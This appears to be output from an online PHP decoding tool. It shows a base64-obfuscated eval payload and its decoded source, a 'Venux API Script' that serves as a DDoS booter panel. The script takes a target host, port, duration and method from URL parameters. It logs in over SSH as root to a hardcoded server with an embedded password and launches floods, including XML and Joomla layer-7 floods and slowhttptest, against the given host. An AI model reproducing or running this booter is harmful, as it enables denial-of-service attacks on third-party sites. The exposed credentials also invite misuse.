Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval("?>".base64_decode("PD9waHANCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL ..
Decoded Output download
?>b'<?php
/////////////////////////////////
//-- Venux API Script - Modified by Aggron --//
/////////////////////////////////
ignore_user_abort(true);
set_time_limit(0);
//////////////////////////////////////////
//-- You\'re servers credentials --//
//-- Enter you\'re servers credentials --//
//////////////////////////////////////////
$server_ip = "80.211.228.54"; //Change "1337" to your servers IP.
$server_pass = "pretectiegarantataantiinjectmixasiflt(m3)dt31637htmlacunetixt8652654654645"; //Change "pass" to your servers password.
$server_user = "root"; //Only change this if your using a user other than root.
/////////////////////////////////////////
//-- Gets the value of each variable --//
/////////////////////////////////////////
$key = $_GET[\'key\'];
$host = $_GET[\'host\'];
$port = intval($_GET[\'port\']);
$time = intval($_GET[\'time\']);
$method = $_GET[\'method\'];
$action = $_GET[\'action\'];
///////////////////////////////////////////////////
//-- array of implemented method as a variable --//
///////////////////////////////////////////////////
$array = array("joomla", "xml", "slow", "stop");// Add you\'re existing methods here, and delete you\'re none existent methods.
$ray = array("apikey");
////////////////////////////////////////
//-- Checks if the API key is empty --//
////////////////////////////////////////
if (!empty($key)){
}else{
die(\'Error: API key is empty!\');}
//////////////////////////////////////////
//-- Checks if the API key is correct --//
//////////////////////////////////////////
if (in_array($key, $ray)){ //Change "key" to what ever yo want you\'re API key to be.
}else{
die(\'Error: Incorrect API key!\');}
/////////////////////////////////
//-- Checks if time is empty --//
/////////////////////////////////
if (!empty($time)){
}else{
die(\'Error: time is empty!\');}
/////////////////////////////////
//-- Checks if host is empty --//
/////////////////////////////////
if (!empty($host)){
}else{
die(\'Error: Host is empty!\');}
///////////////////////////////////
//-- Checks if method is empty --//
///////////////////////////////////
if (!empty($method)){
}else{
die(\'Error: Method is empty!\');}
///////////////////////////////////
//-- Checks if method is empty --//
///////////////////////////////////
if (in_array($method, $array)){
}else{
die(\'Error: The method you requested does not exist!\');}
///////////////////////////////////////////////////
//-- Uses regex to see if the Port could exist --//
///////////////////////////////////////////////////
if ($port > 44405){
die(\'Error: Ports over 44405 do not exist\');}
//////////////////////////////////
//-- Sets a Maximum boot time --//
//////////////////////////////////
if ($time > 36000){
die(\'Error: Cannot exceed 36000 seconds!\');} //Change 10 to the time you used above.
if(ctype_digit($Time)){
die(\'Error: Time is not in numeric form!\');}
if(ctype_digit($Port)){
die(\'Error: Port is not in numeric form!\');}
//////////////////////////////////////////////////////////////////////////////
//-- You\'re attack methods --//
//-- Make sure the command is formatted correctly for each method you add --//
//////////////////////////////////////////////////////////////////////////////
if ($method == "joomla") { $command = "screen -dm /root/joomla $host listjoomla.txt $time 1000"; }
if ($method == "xml") { $command = "screen -dm /root/xml $host layer7.txt $time 1000"; }
if ($method == "slow") { $command = "screen -dm slowhttptest -c 4000 -B -g -o output-file-name -i 100 -r 500 -s 1024 -u $host -x 20 -l $time"; }
if ($method == "stop") { $command = "pkill $host -f"; }
///////////////////////////////////////////////////////
//-- Check to see if the server has SSH2 installed --//
///////////////////////////////////////////////////////
if (!function_exists("ssh2_connect")) die("Error: SSH2 does not exist on you\'re server");
if(!($con = ssh2_connect($server_ip, 2204))){
echo "Error: Connection Issue";
} else {
///////////////////////////////////////////////////
//-- Attempts to login with you\'re credentials --//
///////////////////////////////////////////////////
if(!ssh2_auth_password($con, $server_user, $server_pass)) {
echo "Error: Login failed, one or more of you\'re server credentials are incorect.";
} else {
////////////////////////////////////////////////////////////////////////////
//-- Tries to execute the attack with the requested method and settings --//
////////////////////////////////////////////////////////////////////////////
if (!($stream = ssh2_exec($con, $command ))) {
echo "Error: You\'re server was not able to execute you\'re methods file and or its dependencies";
} else {
////////////////////////////////////////////////////////////////////
//-- Executed the attack with the requested method and settings --//
////////////////////////////////////////////////////////////////////
stream_set_blocking($stream, false);
$data = "";
while ($buf = fread($stream,4096)) {
$data .= $buf;
}
echo "Attack started!!</br>Hitting: $host</br>On Port: $port </br>Attack Length: $time</br>With: $method";
fclose($stream);
}
}
}
?>'Did this file decode correctly?
Original Code
eval("?>".base64_decode("PD9waHANCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLw0KLy8tLSAgICAgVmVudXggQVBJIFNjcmlwdCAtIE1vZGlmaWVkIGJ5IEFnZ3JvbiAgICAtLS8vD QovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCmlnbm9yZV91c2VyX2Fib3J0KHRydWUpO w0Kc2V0X3RpbWVfbGltaXQoMCk7DQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8NCi8vLS0gICAgWW91J3JlIHNlcnZlcnMgY3JlZGVudGlhbHMgICAgLS0vLw0KLy8tLSBFbnRlc iB5b3UncmUgc2VydmVycyBjcmVkZW50aWFscyAtLS8vDQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8NCiRzZXJ2ZXJfaXAgPSAiODAuMjExLjIyOC41NCI7IC8vQ2hhbmdlICIxM zM3IiB0byB5b3VyIHNlcnZlcnMgSVAuDQokc2VydmVyX3Bhc3MgPSAicHJldGVjdGllZ2FyYW50YXRhY W50aWluamVjdG1peGFzaWZsdChtMylkdDMxNjM3aHRtbGFjdW5ldGl4dDg2NTI2NTQ2NTQ2NDUiOyAvL 0NoYW5nZSAicGFzcyIgdG8geW91ciBzZXJ2ZXJzIHBhc3N3b3JkLg0KJHNlcnZlcl91c2VyID0gInJvb 3QiOyAvL09ubHkgY2hhbmdlIHRoaXMgaWYgeW91ciB1c2luZyBhIHVzZXIgb3RoZXIgdGhhbiByb290L g0KIA0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCi8vLS0gR2V0cyB0a GUgdmFsdWUgb2YgZWFjaCB2YXJpYWJsZSAtLS8vDQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLw0KJGtleSA9ICRfR0VUWydrZXknXTsNCiRob3N0ID0gJF9HRVRbJ2hvc3QnXTsNC iRwb3J0ID0gaW50dmFsKCRfR0VUWydwb3J0J10pOw0KJHRpbWUgPSBpbnR2YWwoJF9HRVRbJ3RpbWUnX Sk7DQokbWV0aG9kID0gJF9HRVRbJ21ldGhvZCddOw0KJGFjdGlvbiA9ICRfR0VUWydhY3Rpb24nXTsNC iANCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KLy8tL SBhcnJheSBvZiBpbXBsZW1lbnRlZCBtZXRob2QgYXMgYSB2YXJpYWJsZSAtLS8vDQovLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCiRhcnJheSA9IGFycmF5KCJqb 29tbGEiLCAieG1sIiwgInNsb3ciLCAic3RvcCIpOy8vIEFkZCB5b3UncmUgZXhpc3RpbmcgbWV0aG9kc yBoZXJlLCBhbmQgZGVsZXRlIHlvdSdyZSBub25lIGV4aXN0ZW50IG1ldGhvZHMuDQokcmF5ID0gYXJyY XkoImFwaWtleSIpOw0KIA0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KL y8tLSBDaGVja3MgaWYgdGhlIEFQSSBrZXkgaXMgZW1wdHkgLS0vLw0KLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KaWYgKCFlbXB0eSgka2V5KSl7DQp9ZWxzZXsNCmRpZSgnRXJyb 3I6IEFQSSBrZXkgaXMgZW1wdHkhJyk7fQ0KIA0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vDQovLy0tIENoZWNrcyBpZiB0aGUgQVBJIGtleSBpcyBjb3JyZWN0IC0tLy8NCi8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KaWYgKGluX2FycmF5KCRrZXksI CRyYXkpKXsgLy9DaGFuZ2UgImtleSIgdG8gd2hhdCBldmVyIHlvIHdhbnQgeW91J3JlIEFQSSBrZXkgd G8gYmUuDQp9ZWxzZXsNCmRpZSgnRXJyb3I6IEluY29ycmVjdCBBUEkga2V5IScpO30NCiANCi8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KLy8tLSBDaGVja3MgaWYgdGltZSBpcyBlbXB0eSAtL S8vDQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCmlmICghZW1wdHkoJHRpbWUpKXsNC n1lbHNlew0KZGllKCdFcnJvcjogdGltZSBpcyBlbXB0eSEnKTt9DQogDQovLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8NCi8vLS0gQ2hlY2tzIGlmIGhvc3QgaXMgZW1wdHkgLS0vLw0KLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQppZiAoIWVtcHR5KCRob3N0KSl7DQp9ZWxzZXsNCmRpZ SgnRXJyb3I6IEhvc3QgaXMgZW1wdHkhJyk7fQ0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8NCi8vLS0gQ2hlY2tzIGlmIG1ldGhvZCBpcyBlbXB0eSAtLS8vDQovLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLw0KaWYgKCFlbXB0eSgkbWV0aG9kKSl7DQp9ZWxzZXsNCmRpZSgnRXJyb 3I6IE1ldGhvZCBpcyBlbXB0eSEnKTt9DQogDQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLw0KLy8tLSBDaGVja3MgaWYgbWV0aG9kIGlzIGVtcHR5IC0tLy8NCi8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vDQppZiAoaW5fYXJyYXkoJG1ldGhvZCwgJGFycmF5KSl7DQp9ZWxzZXsNC mRpZSgnRXJyb3I6IFRoZSBtZXRob2QgeW91IHJlcXVlc3RlZCBkb2VzIG5vdCBleGlzdCEnKTt9DQovL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCi8vLS0gVXNlc yByZWdleCB0byBzZWUgaWYgdGhlIFBvcnQgY291bGQgZXhpc3QgLS0vLw0KLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQppZiAoJHBvcnQgPiA0NDQwNSl7DQpka WUoJ0Vycm9yOiBQb3J0cyBvdmVyIDQ0NDA1IGRvIG5vdCBleGlzdCcpO30NCiANCi8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCi8vLS0gU2V0cyBhIE1heGltdW0gYm9vdCB0aW1lIC0tLy8NC i8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8gICAgICAgICAgICAgDQppZiAoJHRpbWUgP iAzNjAwMCl7DQpkaWUoJ0Vycm9yOiBDYW5ub3QgZXhjZWVkIDM2MDAwIHNlY29uZHMhJyk7fSAvL0NoY W5nZSAxMCB0byB0aGUgdGltZSB5b3UgdXNlZCBhYm92ZS4NCiANCmlmKGN0eXBlX2RpZ2l0KCRUaW1lK Sl7DQpkaWUoJ0Vycm9yOiBUaW1lIGlzIG5vdCBpbiBudW1lcmljIGZvcm0hJyk7fQ0KIA0KaWYoY3R5c GVfZGlnaXQoJFBvcnQpKXsNCmRpZSgnRXJyb3I6IFBvcnQgaXMgbm90IGluIG51bWVyaWMgZm9ybSEnK Tt9DQogDQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCi8vLS0gICAgICAgICAgICAgICAgICAgICAgICBZb3Unc mUgYXR0YWNrIG1ldGhvZHMgICAgICAgICAgICAgICAgICAgICAgICAgLS0vLw0KLy8tLSBNYWtlIHN1c mUgdGhlIGNvbW1hbmQgaXMgZm9ybWF0dGVkIGNvcnJlY3RseSBmb3IgZWFjaCBtZXRob2QgeW91IGFkZ CAtLS8vDQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCmlmICgkbWV0aG9kID09ICJqb29tbGEiKSB7ICRjb21tY W5kID0gInNjcmVlbiAtZG0gL3Jvb3Qvam9vbWxhICRob3N0IGxpc3Rqb29tbGEudHh0ICR0aW1lIDEwM DAiOyB9DQppZiAoJG1ldGhvZCA9PSAieG1sIikgeyAkY29tbWFuZCA9ICJzY3JlZW4gLWRtIC9yb290L 3htbCAkaG9zdCBsYXllcjcudHh0ICR0aW1lIDEwMDAiOyB9DQppZiAoJG1ldGhvZCA9PSAic2xvdyIpI HsgJGNvbW1hbmQgPSAic2NyZWVuIC1kbSBzbG93aHR0cHRlc3QgLWMgNDAwMCAtQiAtZyAtbyBvdXRwd XQtZmlsZS1uYW1lIC1pIDEwMCAtciA1MDAgLXMgMTAyNCAtdSAkaG9zdCAteCAyMCAtbCAkdGltZSI7I H0NCmlmICgkbWV0aG9kID09ICJzdG9wIikgeyAkY29tbWFuZCA9ICJwa2lsbCAkaG9zdCAtZiI7IH0NC i8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCi8vL S0gQ2hlY2sgdG8gc2VlIGlmIHRoZSBzZXJ2ZXIgaGFzIFNTSDIgaW5zdGFsbGVkIC0tLy8NCi8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCmlmICghZnVuY 3Rpb25fZXhpc3RzKCJzc2gyX2Nvbm5lY3QiKSkgZGllKCJFcnJvcjogU1NIMiBkb2VzIG5vdCBleGlzd CBvbiB5b3UncmUgc2VydmVyIik7DQppZighKCRjb24gPSBzc2gyX2Nvbm5lY3QoJHNlcnZlcl9pcCwgM jIwNCkpKXsNCiAgZWNobyAiRXJyb3I6IENvbm5lY3Rpb24gSXNzdWUiOw0KfSBlbHNlIHsNCiANCi8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KLy8tLSBBdHRlb XB0cyB0byBsb2dpbiB3aXRoIHlvdSdyZSBjcmVkZW50aWFscyAtLS8vDQovLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCiAgICBpZighc3NoMl9hdXRoX3Bhc3N3b 3JkKCRjb24sICRzZXJ2ZXJfdXNlciwgJHNlcnZlcl9wYXNzKSkgew0KICAgICAgICBlY2hvICJFcnJvc jogTG9naW4gZmFpbGVkLCBvbmUgb3IgbW9yZSBvZiB5b3UncmUgc2VydmVyIGNyZWRlbnRpYWxzIGFyZ SBpbmNvcmVjdC4iOw0KICAgIH0gZWxzZSB7DQogICAgICAgDQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQovLy0tI FRyaWVzIHRvIGV4ZWN1dGUgdGhlIGF0dGFjayB3aXRoIHRoZSByZXF1ZXN0ZWQgbWV0aG9kIGFuZCBzZ XR0aW5ncyAtLS8vDQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vICAgDQogICAgICAgIGlmICghKCRzdHJlYW0gPSBzc 2gyX2V4ZWMoJGNvbiwgJGNvbW1hbmQgKSkpIHsNCiAgICAgICAgICAgIGVjaG8gIkVycm9yOiBZb3Unc mUgc2VydmVyIHdhcyBub3QgYWJsZSB0byBleGVjdXRlIHlvdSdyZSBtZXRob2RzIGZpbGUgYW5kIG9yI Gl0cyBkZXBlbmRlbmNpZXMiOw0KICAgICAgICB9IGVsc2Ugew0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCi8vLS0gRXhlY3V0Z WQgdGhlIGF0dGFjayB3aXRoIHRoZSByZXF1ZXN0ZWQgbWV0aG9kIGFuZCBzZXR0aW5ncyAtLS8vDQovL y8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vL y8vLy8vLyAgICAgIA0KICAgICAgICAgICAgc3RyZWFtX3NldF9ibG9ja2luZygkc3RyZWFtLCBmYWxzZ Sk7DQogICAgICAgICAgICAkZGF0YSA9ICIiOw0KICAgICAgICAgICAgd2hpbGUgKCRidWYgPSBmcmVhZ Cgkc3RyZWFtLDQwOTYpKSB7DQogICAgICAgICAgICAgICAgJGRhdGEgLj0gJGJ1ZjsNCiAgICAgICAgI CAgIH0NCiAgICAgICAgICAgICAgICAgICAgICAgIGVjaG8gIkF0dGFjayBzdGFydGVkISE8L2JyPkhpd HRpbmc6ICRob3N0PC9icj5PbiBQb3J0OiAkcG9ydCA8L2JyPkF0dGFjayBMZW5ndGg6ICR0aW1lPC9ic j5XaXRoOiAkbWV0aG9kIjsNCiAgICAgICAgICAgIGZjbG9zZSgkc3RyZWFtKTsNCiAgICAgICAgfQ0KI CAgIH0NCn0NCj8+"));Function Calls
| base64_decode | 1 |
Stats
| MD5 | d85956a1dc7fa904c992e329276a5e4a |
| Eval Count | 1 |
| Decode Time | 97 ms |